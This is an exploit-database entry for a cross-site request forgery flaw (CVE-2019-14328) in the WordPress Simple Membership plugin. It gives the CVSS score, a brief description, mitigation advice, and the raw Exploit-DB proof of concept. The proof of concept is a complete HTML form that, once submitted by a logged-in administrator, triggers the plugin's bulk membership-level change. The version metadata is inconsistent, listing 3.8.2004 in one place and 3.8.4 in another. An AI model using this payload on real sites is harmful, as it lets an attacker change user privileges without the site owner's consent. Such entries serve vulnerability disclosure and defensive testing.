Cross Site Request Forgery in Wordpress Simple Membership plugin

vendor:

Simple Membership

by:

rubyman

8.8

CVSS

HIGH

Cross Site Request Forgery

352

CWE

Product Name: Simple Membership

Affected Version From: 3.8.2004

Affected Version To: 3.8.2004

Patch Exists: NO

Related CWE: CVE-2019-14328

CPE: a:simple_membership_project:simple_membership:3.8.4

Metasploit:

Other Scripts:

Platforms Tested: Windows 8.1

2019

Cross Site Request Forgery in WordPress Simple Membership plugin

This exploit allows an attacker to perform unauthorized actions on behalf of a user by tricking them into submitting a malicious form. In this case, the exploit targets the WordPress Simple Membership plugin, allowing the attacker to change a user's membership level.

Mitigation:

The vendor should release a patch to fix this vulnerability. Users should update to the latest version of the plugin and ensure they have proper security measures in place to protect against CSRF attacks.

Source

Exploit-DB raw data:

# Exploit Title: Cross Site Request Forgery in Wordpress Simple Membership plugin
# Date: 2019-07-27
# Exploit Author: rubyman
# Vendor Homepage: https://wordpress.org/plugins/simple-membership/
# wpvulndb : https://wpvulndb.com/vulnerabilities/9482
# Version: 3.8.4
# Tested on: Windows 8.1
# CVE : CVE-2019-14328

#
# Change localhost to your desired host
#

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wordpress/wp-admin/admin.php?page=simple_wp_membership&member_action=bulk" method="POST">
      <input type="hidden" name="swpm&#95;bulk&#95;change&#95;level&#95;from" value="2" />
      <input type="hidden" name="swpm&#95;bulk&#95;change&#95;level&#95;to" value="3" />
      <input type="hidden" name="swpm&#95;bulk&#95;change&#95;level&#95;process" value="Bulk&#32;Change&#32;Membership&#32;Level" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>